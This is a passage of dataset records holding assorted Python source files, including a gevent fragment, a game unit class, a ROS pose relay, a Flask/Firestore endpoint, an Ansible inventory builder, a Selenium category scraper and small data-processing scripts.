Our wrapper cannot refer to self.\n io_holder = self.__io_holder\n lock = self.lock\n threadpool = self.threadpool\n\n @functools.wraps(method)\n def thread_method(*args, **kwargs):\n if io_holder[0] is None:\n # This is different than FileObjectPosix, etc,\n # because we want to save the expensive trip through\n # the threadpool.\n raise FileObjectClosed()\n with lock:\n return threadpool.apply(method, args, kwargs)\n\n return thread_method\n","sub_path":"venv/Lib/site-packages/gevent/_fileobjectcommon.py","file_name":"_fileobjectcommon.py","file_ext":"py","file_size_in_byte":9652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469284195","text":"#!/usr/bin/env python2.7\n# -*- coding:UTF-8 -*-2\nu\"\"\"player.py\n\nCopyright(c)2019 Yukio Kuro\nThis software is released under BSD license.\n\nプレイヤーモジュール。\n\"\"\"\nimport unit as __unit\nimport utils.memoize as _memoize\n\n\nclass Player(__unit.Unit):\n u\"\"\"プレイヤー。\n \"\"\"\n _PLANET = 0\n _ABILITY = []\n\n def __init__(self, pos, data, packet, group=None):\n u\"\"\"コンストラクタ。\n \"\"\"\n self.__is_another = False\n super(Player, self).__init__(pos, data, packet, group)\n\n def __repr__(self):\n u\"\"\"文字列表現取得。\n \"\"\"\n return (\n u\"\").format(\n type=self.__class__.__name__, name=self._data.name,\n power_up=self.power_up_level,\n direction=\"Right\" if self._is_right else \"Left\",\n another=\"Another\" if self.__is_another else \"Basic\")\n\n def set_equip(self, wp, hlm, armr, acs):\n u\"\"\"装備設定。\n \"\"\"\n import armament.equip as __equip\n\n class __BrokenEquip(object):\n u\"\"\"装備データアダプタ。\n 装備の破損を表現する。\n \"\"\"\n __slots__ = \"__data\", \"__broken\"\n __TIME_TO_RECOVERY = 6\n\n def __init__(self, data):\n u\"\"\"コンストラクタ。\n data: 装備データ。\n \"\"\"\n self.__data = data\n self.__broken = 0\n\n def __repr__(self):\n u\"\"\"文字列表現取得。\n \"\"\"\n return self.__data.__repr__()\n\n def get_special(self, lv):\n u\"\"\"武器効果取得。\n \"\"\"\n effect = self.__data.get_special(lv)\n return effect if effect and not self.__is_broken else ()\n\n def get_sustain(self, turn):\n u\"\"\"頭防具効果取得。\n \"\"\"\n effect = self.__data.get_sustain(turn)\n return effect if effect and not self.__is_broken else ()\n\n def is_prevents(self, target):\n u\"\"\"ブロック変化防止判定。\n \"\"\"\n if self.__data.is_prevents(target) and not self.__is_broken:\n return True\n else:\n return False\n\n def break_(self):\n u\"\"\"破損させる。\n \"\"\"\n self.__broken = self.__TIME_TO_RECOVERY\n\n def repair(self):\n u\"\"\"修復する。\n 修復した場合、Trueを返す。\n \"\"\"\n if 0 < self.__broken:\n self.__broken = 0\n return True\n return False\n\n @property\n def name(self):\n u\"\"\"名前取得。\n \"\"\"\n return self.__data.name\n\n @property\n def number(self):\n u\"\"\"番号取得。\n \"\"\"\n return self.__data.number\n\n @property\n def additional(self):\n u\"\"\"アクセサリによるパターン変更リクエストを取得。\n \"\"\"\n return (\n self.__data.additional if self.__data.additional and\n not self.__is_broken else ())\n\n @property\n def value(self):\n u\"\"\"能力値取得。\n \"\"\"\n return 0 if self.__is_broken else self.__data.value\n\n @property\n def icon(self):\n u\"\"\"画像番号からアイコン取得。\n \"\"\"\n return self.__data.icon\n\n @property\n def is_useable(self):\n u\"\"\"使用可能状態取得。\n \"\"\"\n return (\n False if self.__data.number == 0 else\n self.__broken <= 0)\n\n @property\n def __is_broken(self):\n u\"\"\"破損状態取得。\n 徐々に修復される。\n \"\"\"\n if 0 < self.__broken:\n self.__broken -= 1\n return True\n else:\n return False\n self.__equip = (\n __BrokenEquip(__equip.get(wp)),\n __BrokenEquip(__equip.get(hlm)),\n 
__BrokenEquip(__equip.get(armr)),\n __BrokenEquip(__equip.get(acs)))\n\n def add_effect(self, effect):\n u\"\"\"エフェクト追加。\n すでに文字表示エフェクトが存在する場合は、eliminateする。\n \"\"\"\n if self._effect and not self._effect.is_dead:\n self._effect.eliminate()\n self._effect = None\n self._effect = effect\n\n def attack(self):\n u\"\"\"攻撃処理。\n \"\"\"\n lv = self._power/self._packet\n power = self.release()\n if 0 < power:\n self.flash()\n stroke = self._get_attack(\n self._data.str+self.weapon.value, self.attack_level, power)\n return stroke, lv\n return 0, 0\n\n @property\n def _vit(self):\n u\"\"\"ユニットの守り+装備の防御力取得。\n \"\"\"\n return (\n self._data.vit+self.helm.value +\n self.armor.value+self.accessory.value)\n\n @property\n def base_image(self):\n u\"\"\"基本画像取得。\n \"\"\"\n return self._data.get_image(False, self.__is_another)\n\n @property\n @_memoize.memoize()\n def current_image(self):\n u\"\"\"現在画像取得。\n \"\"\"\n return self.data.get_image(self.is_right, self.__is_another)\n\n @property\n def is_another(self):\n u\"\"\"アナザー状態取得。\n \"\"\"\n return self.__is_another\n\n @is_another.setter\n def is_another(self, value):\n u\"\"\"アナザー状態設定。\n \"\"\"\n self.__is_another = bool(value)\n self.image = self.current_image\n\n @property\n def equip(self):\n u\"\"\"装備取得。\n \"\"\"\n return self.__equip\n\n @property\n def weapon(self):\n u\"\"\"武器取得。\n \"\"\"\n weapon, _, _, _ = self.__equip\n return weapon\n\n @property\n def helm(self):\n u\"\"\"頭防具取得。\n \"\"\"\n _, helm, _, _ = self.__equip\n return helm\n\n @property\n def armor(self):\n u\"\"\"体防具取得。\n \"\"\"\n _, _, armor, _ = self.__equip\n return armor\n\n @property\n def accessory(self):\n u\"\"\"装飾品取得。\n \"\"\"\n _, _, _, accessory = self.__equip\n return accessory\n","sub_path":"Source/armament/units/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":6838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"315666584","text":"#!/usr/bin/env python\nfrom time import sleep\n\nimport rospy\nfrom std_msgs.msg import Int16\nfrom geometry_msgs.msg import PoseStamped\nfrom ifutr.msg import Pozyx_Pose\n\n\n\n\n\nclass Fake_GPS(object):\n\n def __init__(self):\n self.r = rospy.Rate(5)\n self.pub = rospy.Publisher('/mavros/mocap/pose', PoseStamped, queue_size=10)\n self.sub = rospy.Subscriber('/pose', PoseStamped, self.poseCallback)\n self.gps = PoseStamped()\n\n\n def poseCallback(self, msg):\n self.gps = msg\n #print(self.gps)\n\n\n def run(self):\n while not rospy.is_shutdown():\n self.gps.header.stamp = rospy.Time.now()\n self.gps.header.frame_id = 'map'\n #self.pose.pose.position.x = position.x\n #self.pose.pose.position.y = position.y\n #self.pose.pose.position.z = position.z\n #self.gps.pose.position.x = 1.5\n #self.gps.pose.position.y = 1.5\n #self.gps.pose.position.z = 1.5\n self.gps.pose.orientation.w = 1.0\n self.pub.publish(self.gps)\n self.r.sleep()\n\n\ndef initialize():\n rospy.init_node('Fake_GPS', anonymous=False)\n\n\n\nif __name__ == \"__main__\":\n initialize()\n g = Fake_GPS()\n g.run()\n","sub_path":"ifutr/scripts/sensors/GPS.py","file_name":"GPS.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"277188460","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function\n\nfrom flask import request, g\n\nfrom . import Resource\nfrom .. 
import schemas\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport json\n\nclass Record(Resource):\n\n def get(self):\n if firebase_admin._DEFAULT_APP_NAME not in firebase_admin._apps:\n cred = credentials.Certificate('serviceAccountKey.json')\n firebase_admin.initialize_app(cred)\n db = firestore.client()\n records_ref = db.collection(u'records')\n\n print(g.args)\n if 'SupervisorID' in g.args.keys():\n query = records_ref.where(u'supervisor_uid', u'==', g.args['SupervisorID']).where(u'record_status', u'==', g.args['record_status']).stream()\n docs = []\n print('AAAAAAA')\n for doc in query:\n docs.append((doc.id, doc.to_dict()))\n if docs == []:\n respond = {'status': 1}\n return respond, 404, None\n print(docs)\n body=[]\n for doc in docs:\n body.append({'RecordID':doc[1],'record_name':doc[1]['record_name'],'log_name':doc[1]['log_name'],'user_email':doc[1]['user_email']})\n respond=body\n print(respond)\n return respond,200,None\n if 'userID' in g.args.keys():\n query = records_ref.where(u'user_email', u'==', g.args['userID']).where(u'record_status', u'==', g.args['record_status']).stream()\n docs = []\n for doc in query:\n docs.append((doc.id, doc.to_dict()))\n if docs == []:\n respond = {'status': 1}\n return respond, 404, None\n body=[]\n for doc in docs:\n body.append({'RecordID':doc[0],'record_name':doc[1]['record_name'],'log_name':doc[1]['log_name'],'user_email':doc[1]['user_email']})\n return {'status':0,'body':body},200,None\n","sub_path":"chatbot/app13/demo/v1/api/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48115715","text":"# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0\n# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt\n\n\"\"\"A configuring plugin for test_plugins.py to import.\"\"\"\n\nimport coverage\n\n\nclass Plugin(coverage.CoveragePlugin):\n \"\"\"A configuring plugin for testing.\"\"\"\n def configure(self, config):\n \"\"\"Configure all the things!\"\"\"\n opt_name = \"report:exclude_lines\"\n exclude_lines = config.get_option(opt_name)\n exclude_lines.append(r\"pragma: custom\")\n exclude_lines.append(r\"pragma: or whatever\")\n config.set_option(opt_name, exclude_lines)\n\n\ndef coverage_init(reg, options): # pylint: disable=unused-argument\n \"\"\"Called by coverage to initialize the plugins here.\"\"\"\n reg.add_configurer(Plugin())\n","sub_path":"tests/plugin_config.py","file_name":"plugin_config.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"191052823","text":"import pandas\nimport xlrd\nimport xlsxwriter\nfrom decimal import Decimal\nfrom datetime import datetime, date\nimport numpy\nimport math\nimport time\n# import xlutils.copy\n\n\n# bringing info from the excel file in to work on. 
Remember if you move this file, change this location.\ndef import_excel_file(file_name, datetime_col_name):\n data_file_name = pandas.read_excel(file_name)\n # get data frame with the selected columns.\n data_file_name = split_datetime(data_file_name, datetime_col_name)\n print('Import complete')\n return data_file_name\n\n\n# printing column names, if needed.\ndef get_col_names(data_file_name):\n print(data_file_name.columns)\n\n\n# printing values for a given column, if needed.\ndef get_col_values(data_file_name, name_of_column):\n values = data_file_name['name_of_column'].values\n print(values)\n\n\n# splitting 'Response_Date' into date and time columns.\ndef split_datetime(data_file_name, datetime_col_name):\n data_file_name['Date'] = data_file_name[datetime_col_name].dt.date\n data_file_name['Time'] = data_file_name[datetime_col_name].dt.time\n print('Time/Date Split complete.')\n return data_file_name\n\n\n# Dropping calls with NaN entries\ndef drop_empties(data_file_name):\n data_file_name = data_file_name.dropna()\n print('Empties dispose Complete')\n return data_file_name\n\n\n# this is the length of the dataframe, in case there are more entries added.\ndef get_length(data_file_name):\n length = len(data_file_name.index)\n\n\n# for some reason the formatting in lat/lng isn't importing properly, so divide to get the correct locations\n# and save the information to the Call_Information file.\ndef correct_LatLong(data_file_name, length):\n for index in data_file_name.ix[1:].iterrows():\n index[1]['Latitude'] = (int(index[1]['Latitude']) / 1000000)\n index[1]['Longitude'] = (int(index[1]['Longitude']) / 1000000)\n i = index[0]\n # If the loop reaches the end of the file, then save the information in the file.\n if i is length:\n save_excel_file('Call_Information.xlsx', 'Call Information', data_file_name)\n return data_file_name\n\n\n# counting occurrence of each type of report. 
Sorts list in order of number of occurrences for each type\ndef count_occurrences(data_file_name, occurrence_list):\n count = pandas.Series({w: data_file_name['Problem'].str.contains(w, case=False).sum() for w in occurrence_list})\n count = count.sort_values(ascending=False)\n print(count)\n\n\ndef count_days(data_file_name, days_list):\n count = pandas.Series({w: data_file_name['Date'].str.contains(w, case=False).sum() for w in days_list})\n count = count.sort_values(ascending=False)\n print(count)\n\n\ndef find_Duplicates(data_file_name, occurrence_list):\n count_doubles = 0\n data_file_copy = data_file_name.copy()\n # this goes through the data and finds duplicates, based on a maximum of 4 minutes between calls,\n # and a change in lat/long location of less than .000001.\n for id1, id2 in zip(data_file_copy.iterrows(), data_file_copy.loc[1:].iterrows()):\n # this duration takes the difference between two times and returns it\n duration = datetime.combine(date.min, id2[1]['Time']) - datetime.combine(date.min, (id1[1]['Time']))\n # this duration gathers the seconds from the duration above then the minutes line changes that number\n # to the absolute value of the actual number of minutes, ignoring\n duration = duration.total_seconds()\n minutes = math.fabs(duration / 60.0)\n # this section is testing whether the calls inside the 4 minute threshold are actually\n # close enough together to be regarding the same accident\n if minutes < 4:\n # if the calls are within 4 minutes of one another, are the lat and long in close proximity as well?\n # the division by 1 mil is required in each loop, since for some reason it refuses to save in the dataframe.\n correct_LatLong(data_file_copy, get_length(data_file_copy))\n # find the absolute value of the change in both lat and lng.\n latChange = math.fabs(id1[1]['Latitude'] - id2[1]['Latitude'])\n longChange = math.fabs(id1[1]['Longitude'] - id2[1]['Longitude'])\n # if the lat/long are in close proximity, print the information.\n if latChange < 0.0001 and longChange < 0.0001:\n # this increments the count of the doubles found.\n count_doubles += 1\n # deciding which entry will be recorded/deleted, based off problem level\n # this section deletes any blank space left at the beginning of the cell by the data enterer.\n problem1 = id1[1]['Problem'].lstrip()\n problem2 = id2[1]['Problem'].lstrip()\n # printing to be sure the levels are reporting properly.\n # print(\"Problem of first call: \", problem1, \". Level of first call:\", occurrence_list.index(problem1))\n # print(\"Problem of second call: \", problem2, \". 
Level of second call:\", occurrence_list.index(problem2))\n # if the level on the index of the first call is a higher concern than the second.\n if occurrence_list.index(problem1) >= occurrence_list.index(problem2):\n print(id2[0])\n data_file_name.drop(id2[0])\n # just delete the other call instead of making a variable here.\n # if the level on the second call is higher than the first\n else:\n print(id1[0])\n data_file_name.drop(id1[0])\n # more printing to make sure everything is working correctly.\n # print(\"Highest level problem:\" ,problem)\n # print ('Duration: %.5f ' % minutes, 'Lat1:',id1[1]['Latitude'], 'Lat2:',id2[1]['Latitude'])\n # print( 'Change: %.6f ' % latChange)\n # print ('Long1:',id1[1]['Longitude'], 'Long2:',id2[1]['Longitude'], 'Change: %.6f ' % longChange)\n # Print the number of total duplicate calls.\n print(\"There were :\", count_doubles, \"occurrences of duplicate calls.\")\n return data_file_name\n\n\n# Saving this set to a new excel sheet, when you're done\ndef save_excel_file(save_file_name, sheet, data_file_name):\n writer = pandas.ExcelWriter(save_file_name, engine='xlsxwriter', date_format='mmm d yyyy')\n data_file_name.to_excel(writer, sheet_name=sheet)\n workbook = writer.book\n worksheet = writer.sheets[sheet]\n writer.save()\n\n\ndef save_text_file(CSV_save_file_name, data_file_name):\n data_file_name.to_csv(CSV_save_file_name, sep=',', index=False)\n\n\ndef drop_duplicates(data_file_name, drop_name):\n # i = 0\n # while i < (len(drop_name)):\n for i in range(len(drop_name)):\n data_file_name.drop(data_file_name.index[drop_name[0][i]])\n print ('Dropping row at index {}'.format(drop_name[0][i]))\n # i += 1\n\n print (data_file_name.head())\n return data_file_name\n\ndef main():\n file_name = 'Accident Report - 4-29-2015 - 4-29-2018.xls'\n save_file_name = 'Call_Information.xls'\n sheet = 'Call Information'\n datetime_col_name = 'Response_Date'\n FORMAT = ['Latitude', 'Longitude', 'Date', 'Time', 'Problem']\n occurrence_list = ['Unknown Injuries', 'Delayed', 'No Injuries', 'Injuries', 'Entrapment', 'Mass Casualty']\n days_list = ['Sunday','Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sunday']\n\n data_file_name = import_excel_file(file_name, datetime_col_name)\n data_file_name = data_file_name[FORMAT]\n data_file_name = drop_empties(data_file_name)\n data_file_name = correct_LatLong(data_file_name, get_length(data_file_name))\n count_occurrences(data_file_name, occurrence_list)\n\n print(data_file_name.head())\n drop_name = pandas.read_csv('dup.txt', sep=\"\\n\", header=None)\n # print (drop_name.head())\n # i = 0\n # for i in range(0, 30):\n # print(drop_name[0][i])\n drop_duplicates(data_file_name, drop_name)\n #print (data_file_name.head())\n\n #find_Duplicates(data_file_name, occurrence_list)\n print(data_file_name.head())\n save_excel_file(save_file_name, sheet, data_file_name)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Code/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"192051684","text":"from LightPipes import *\nimport matplotlib.pyplot as plt\n\n\ndef TheExample(N, part):\n fig = plt.figure(figsize=(15, 9.5))\n ax1 = fig.add_subplot(221)\n ax2 = fig.add_subplot(222)\n ax3 = fig.add_subplot(223)\n ax4 = fig.add_subplot(224)\n labda = 1000*nm\n size = 120*mm\n\n #z = f*part\n f = 100*cm\n f1 = 10*m\n f2 = f1*f/(f1-f)\n frac = f/f1\n newsize = frac*size\n w = 2*mm\n F = Begin(size, 
labda, N)\n F = RectAperture(w, w, 0, 0, 0, F)\n\n z = f*part\n F = Fresnel(8, F)\n# 1) Using Lens and Fresnel:\n F1 = Lens(f, 0, 0, F)\n F1 = Forvard(z, F1)\n phi1 = Phase(F1)\n phi1 = PhaseUnwrap(phi1)\n I1 = Intensity(0, F1)\n x1 = []\n for i in range(N):\n x1.append((-size/2+i*size/N)/mm)\n\n# 2) Using Lens + LensFresnel and Convert:\n # F2 = Lens(f1, 0, 0, F)\n F2 = LensForvard(f, z, F)\n F2 = Convert(F2)\n if part < 1:\n F2 = Interpol(size, N, 0, 0, 0, 1, F2)\n phi2 = Phase(F2)\n phi2 = PhaseUnwrap(phi2)\n I2 = Intensity(0, F2)\n x2 = []\n\n for i in range(N):\n x2.append((-size/2+i*size/N)/mm)\n\n ax1.plot(x1, phi1[int(N/2)], 'k--', label='Without spherical coordinates')\n ax1.plot(x2, phi2[int(N/2)], 'k', label='With spherical coordinates')\n #ax1.set_xlim(-newsize/2/mm, newsize/2/mm)\n #ax1.set_ylim(-2, 4)\n ax1.set_xlabel('x [mm]')\n ax1.set_ylabel('phase [rad]')\n ax1.set_title('phase, N = %d' % N)\n legend = ax1.legend(loc='upper center', shadow=True)\n\n ax2.plot(x1, I1[int(N/2)], 'k--', label='Without spherical coordinates')\n ax2.plot(x2, I2[int(N/2)], 'k', label='With spherical coordinates')\n # ax2.set_xlim(-newsize/2/mm, newsize/2/mm)\n #ax2.set_ylim(0, 1000)\n ax2.set_xlabel('x [mm]')\n ax2.set_ylabel('Intensity [a.u.]')\n ax2.set_title('intensity, N = %d' % N)\n legend = ax2.legend(loc='upper center', shadow=True)\n\n ax3.imshow(I1)\n ax3.axis('off')\n ax3.set_title('Without spherical coordinates')\n # ax3.set_xlim(int(N/2)-N*frac/2, int(N/2)+N*frac/2)\n #ax3.set_ylim(int(N/2)-N*frac/2, int(N/2)+N*frac/2)\n ax4.imshow(I2)\n ax4.axis('off')\n ax4.set_title('With spherical coordinates')\n plt.figtext(0.3, 0.95, 'Spherical Coordinates, f = 100cm lens\\nGrid dimension is: %d x %d pixels. This is %.2f run' % (\n N, N, part), fontsize=18, color='red')\n\n\n# TheExample(100) # 100 x 100 grid\nfor i in [0.1, 0.3, 0.5, 0.7, 1.3, 1.5, 1.7, 1.9]:\n TheExample(800, i)\n print(i)\n # 1000 x 1000 grid\nplt.show()\n","sub_path":"staff/Lens_Checker.py","file_name":"Lens_Checker.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35277838","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n '''\n Recursion\n '''\n if not inorder: return None\n root = TreeNode(preorder.pop(0))\n inorderIndex = inorder.index(root.val)\n root.left = self.buildTree(preorder, inorder[:inorderIndex])\n root.right = self.buildTree(preorder, inorder[inorderIndex+1:])\n\n return root\n\n # TC: O(n^2)\n\n # SC: O(n) I think if counting the recursive stack memory\n\n # IDEA:\n # use preorder to find the root\n # find the index of root in inorder using root.val\n # split inorder with the root_index\n # recursive call to left and right subtree of the root\n\n # ref: https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/discuss/34613/A-Python-recursive-solution\n # ref: https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/discuss/34579/Python-short-recursive-solution.\n","sub_path":"105_ConstructBinaryTreeFromPreorderAndInorderTraversal/105_1.py","file_name":"105_1.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"1824421","text":"import 
json\r\n\r\n\r\nclass HostsNotFound(Exception):\r\n \"\"\"Raised when a host does not exists in inventory\r\n Example: raise HostNotFound(\"host1\")\r\n \"\"\"\r\n pass\r\n\r\n\r\nclass GroupsNotFound(Exception):\r\n \"\"\"Raised when a group does not exists in inventory\r\n Example: raise GroupNotFound(\"group1\")\r\n \"\"\"\r\n pass\r\n\r\n\r\nclass AnsibleInventory:\r\n\r\n def __init__(self, *hosts):\r\n self._inventory = {\r\n \"_meta\": {\r\n \"hostvars\": {}\r\n },\r\n \"all\": {\r\n \"vars\": {},\r\n \"hosts\": set(),\r\n \"children\": set([\"ungrouped\"])\r\n },\r\n \"ungrouped\": {\r\n \"hosts\": set()\r\n }\r\n }\r\n\r\n # internal attributes for easy access to parts of above inventory\r\n self._all_hosts = self._inventory[\"all\"][\"hosts\"]\r\n self._all_children = self._inventory[\"all\"][\"children\"]\r\n self._ungrouped_hosts = self._inventory[\"ungrouped\"][\"hosts\"]\r\n self._hostvars = self._inventory[\"_meta\"][\"hostvars\"]\r\n\r\n for host in hosts:\r\n self.add_host(host)\r\n\r\n def add_host(self, host, **hostvars):\r\n if host not in self._all_hosts:\r\n self._all_hosts.add(host)\r\n self._ungrouped_hosts.add(host)\r\n self._hostvars[host] = hostvars\r\n\r\n def get_hostvars(self, host):\r\n try:\r\n return self._hostvars[host]\r\n except KeyError:\r\n raise HostsNotFound(host)\r\n\r\n def update_hostvars(self, host, **hostvars):\r\n try:\r\n self._hostvars[host].update(hostvars)\r\n except KeyError:\r\n raise HostsNotFound(host)\r\n\r\n def add_group(self, group, **groupvars):\r\n if group in (\"_meta\", \"ungrouped\"):\r\n raise ValueError(\r\n \"a new group cannot use the reserved name '{}'\".format(group))\r\n\r\n if group not in self.groups:\r\n self._inventory[group] = {\r\n \"vars\": groupvars,\r\n \"hosts\": set(),\r\n \"children\": set()\r\n }\r\n self._all_children.add(group)\r\n\r\n def get_groupvars(self, group):\r\n if group not in self.groups:\r\n raise GroupsNotFound(group)\r\n\r\n return self._inventory[group][\"vars\"]\r\n\r\n def update_groupvars(self, group, **groupvars):\r\n if group not in self.groups:\r\n raise GroupsNotFound(group)\r\n\r\n self._inventory[group][\"vars\"].update(groupvars)\r\n\r\n def add_hosts_to_group(self, group, *hosts):\r\n if group not in self.groups:\r\n raise GroupsNotFound(group)\r\n\r\n # Every host is always a member of 'all' hence do nothing\r\n if group == \"all\":\r\n return\r\n\r\n hosts = set(hosts)\r\n\r\n non_existing = hosts - self._all_hosts\r\n if non_existing:\r\n raise HostsNotFound(non_existing)\r\n\r\n self._ungrouped_hosts -= hosts\r\n self._inventory[group][\"hosts\"] |= hosts\r\n\r\n def add_children_to_group(self, parent, *children):\r\n # check all groups exists and they are allowed to be modified\r\n non_existing = set((parent,) + children) - set(self.groups)\r\n # FYI Python3 only syntax can be like:\r\n # non_existing = set([parent, *children]) - set(self.groups)\r\n if non_existing:\r\n raise GroupsNotFound(non_existing)\r\n\r\n # avoid circular dependency\r\n if parent in children:\r\n raise ValueError(\r\n \"group '{}' cannot be a child to itself\".format(parent))\r\n\r\n # finally add all children to parent\r\n self._inventory[parent][\"children\"] |= set(children)\r\n\r\n def keep_hosts_ungrouped_also(self, *hosts):\r\n hosts = set(hosts)\r\n non_existing = hosts - self._all_hosts\r\n if non_existing:\r\n raise HostsNotFound(non_existing)\r\n\r\n self._ungrouped_hosts |= hosts\r\n\r\n @property\r\n def hosts(self):\r\n return list(self._all_hosts)\r\n\r\n @property\r\n def 
ungrouped(self):\r\n return list(self._ungrouped_hosts)\r\n\r\n @property\r\n def groups(self):\r\n grps = list(self._inventory)\r\n grps.remove(\"ungrouped\")\r\n grps.remove(\"_meta\")\r\n return grps\r\n\r\n def __str__(self):\r\n class SetJSONEncoder(json.JSONEncoder):\r\n def default(self, obj):\r\n if isinstance(obj, set):\r\n return list(obj)\r\n # Let the base class default method raise the TypeError\r\n return json.JSONEncoder.default(self, obj)\r\n\r\n return json.dumps(self._inventory, indent=2, cls=SetJSONEncoder)\r\n\r\n def _host_as_ini(self, host):\r\n hostline = [host]\r\n for var, val in self._inventory[\"_meta\"][\"hostvars\"][host].items():\r\n hostline.append(\"{}={}\".format(var, val))\r\n\r\n return \" \".join(hostline)\r\n\r\n def as_ini(self):\r\n final = []\r\n\r\n # process ungrouped hosts\r\n for host in self._inventory[\"ungrouped\"][\"hosts\"]:\r\n final.append(self._host_as_ini(host))\r\n\r\n # process groups\r\n for group in set(self.groups) - {\"all\"}:\r\n data = self._inventory[group]\r\n\r\n if data[\"hosts\"]:\r\n final.append(\"\\n[{}]\".format(group))\r\n for host in data[\"hosts\"]:\r\n final.append(self._host_as_ini(host))\r\n\r\n if data[\"vars\"]:\r\n final.append(\"\\n[{}:vars]\".format(group))\r\n for var, val in data[\"vars\"].items():\r\n final.append(\"{}={}\".format(var, val))\r\n\r\n if data[\"children\"]:\r\n final.append(\"\\n[{}:children]\".format(group))\r\n for child in data[\"children\"]:\r\n final.append(\"{}\".format(child))\r\n\r\n # process all:vars\r\n if self._inventory[\"all\"][\"vars\"]:\r\n final.append(\"\\n[{}:{}]\".format(\"all\", \"vars\"))\r\n for var, val in self._inventory[\"all\"][\"vars\"].items():\r\n final.append(\"{}={}\".format(var, val))\r\n\r\n return \"\\n\".join(final) + \"\\n\"\r\n","sub_path":"Ops/ops/ansible_v2/ansinv.py","file_name":"ansinv.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"335910595","text":"from selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom lxml import etree\nimport time\n\ncategories = ['飞行器', '舰船舰艇', '枪械与单兵', '坦克装甲车辆', '火炮', '导弹武器', '太空装备', '爆炸物']\n\ndef store_relation(category, sub_category):\n with open('D:\\military\\military\\data\\weapon\\schema_huanqiujunshi.txt', 'a', encoding='utf-8') as file_obj:\n file_obj.write(category + \" subclass \" + sub_category)\n file_obj.write('\\n')\n file_obj.close()\n\ndef switch_category(browser, current_category_index):\n if current_category_index != 0:\n bt = browser.find_element_by_link_text(categories[current_category_index])\n bt.click()\n time.sleep(1)\n\ndef main():\n #浏览器打开\n # chromeOptions = Options()\n # chromeOptions.add_argument('C:/Users/92898/AppData/Local/Google/Chrome/User Data/Default/extension')\n # browser = webdriver.Chrome(chrome_options=chromeOptions)\n browser = webdriver.Chrome()\n browser.maximize_window()\n browser.get('http://weapon.huanqiu.com/weaponlist')\n wait = WebDriverWait(browser, 10)\n\n # 顶层concept\n for category in categories:\n store_relation(\"兵器\", category)\n\n #类目遍历\n for index in range(len(categories)):\n #类目转换\n switch_category(browser, index)\n html = etree.HTML(browser.page_source, etree.HTMLParser())\n sub_category = html.xpath('//div[@class=\"select\"]/ul[li[text()=\"大分类:\"]]/li/span[@class=\"list\"]/a/text()')\n for s_ca in sub_category:\n store_relation(categories[index], s_ca)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"WS/Final/military/military/construction/schema/weapon/huanqiujunshi_schema.py","file_name":"huanqiujunshi_schema.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"19194282","text":"\"\"\"\nRename and move PDFs from bib database.\n\"\"\"\n\nimport argparse\nimport os\nimport re\nimport shutil\n\nfrom pybtex.database import parse_file\n\nFILE_FIELD = re.compile('^:(?P<filepath>.*):PDF$')\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('bib', type=str, help='path to bib file')\n parser.add_argument('output', type=str, help='path to output directory')\n return parser.parse_args()\n\n\ndef handle_entry(output_dir, entry):\n old_filepath = re.match(FILE_FIELD, entry.fields['file']).group('filepath')\n new_filepath = os.path.join(output_dir, entry.key + '.pdf')\n shutil.move(old_filepath, new_filepath)\n entry.fields['file'] = f':{new_filepath}:PDF'\n\n\ndef main():\n args = parse_args()\n output_dir = os.path.abspath(args.output)\n data = parse_file(args.bib)\n for entry in data.entries.values():\n if 'file' in entry.fields:\n handle_entry(output_dir, entry)\n # An ugly hack against unnecessary escaping\n data_string = data.to_string('bibtex').replace('\\_', '_').replace('\\&', '&').replace('\\%', '%')\n with open(args.bib, 'w') as f:\n f.write(data_string)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bib_organizer.py","file_name":"bib_organizer.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
